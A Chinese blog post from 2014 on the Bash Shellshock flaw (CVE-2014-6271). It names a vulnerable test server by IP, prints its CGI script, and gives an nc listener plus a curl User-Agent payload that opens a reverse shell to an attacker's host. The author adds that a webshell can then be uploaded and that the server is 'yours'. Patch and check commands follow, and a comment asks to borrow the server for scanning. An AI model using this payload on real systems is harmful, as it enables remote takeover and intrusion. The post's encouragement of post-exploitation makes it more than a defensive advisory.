正在阅读:

[Linux安全]CVE-2014-6271 Bash命令执行测试环境

11,182

最近出了bash命令执行的漏洞,想必大家已经有所耳闻了,但是很多像我一样的小菜不知道怎么测试,还好有大牛帮我们搭建好了测试环境,转载过来大家一起学习研究一下吧。。。此测试环境是习科联创 @夜真灰 牛牛搭建,我已经得到了他的授权,可以转载。。。

关于bash命令执行漏洞的原理,请参考下面的文章:

Bash 3.0-4.3命令执行漏洞分析

CVE-2014-6271测试环境

测试系统为Centos5.9

IP地址为23.239.208.105

没有配置iptables和selinux

cgi poc地址为http://23.239.208.105/cgi-bin/poc.cgi

poc.cgi代码如下

#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0

测试步骤

首先找一个能监听端口的外网ip,Linux和windows都可以,使用nc监听端口12666,我在这里使用linux

nc -l 12666

在一台外网linux主机上执行poc命令(理论上只了联网的应该就可以的)

curl -A "() { :; }; /bin/bash -i > /dev/tcp/xx.xxx.xx.xxx/12666 0<&1 2>&1" http://23.239.208.105/cgi-bin/poc.cgi

就可以将shell反弹出来,那么下面自己找路径,自己wget一个大马上去完全是没有问题的。

bash反弹连接

我已经测试成功了,想必也难不到其它读者的。。。。。

bash命令执行测试环境

bash命令执行测试环境

bash命令执行测试环境

漏洞修补方法:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"  

受影响的系统包括:


CentOS
Debian
Redhat
Ubuntu

红帽系可通过更新 bash 并重启系统来解决这个问题:

yum update bash

或者:

yum update bash-4.1.2-15.el6_5.1

此举只是更新了 bash 包,还需要重启系统才能生效。

Ubuntu 用户可以通过如下命令打补丁,无需重启:

apt-get update   
apt-get install bash

另外,据国外可靠消息,打了bash的补丁之后,系统仍然存在bypass的可能。所以我们将继续观望。

服务器如果被提权了,可以任意修改密码,服务器就归你们了。。。

参考文章:

http://drops.wooyun.org/papers/3064

http://bbs.isilic.org/thread-6459-1-1.html

http://www.waitalone.cn/bash-command-exec.html

目前有:1条访客评论

  1. 石先生
    2019-03-06 08:56

    请问可以把环境借给我用一下么,我想尝试一些nmap扫描这个问题

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌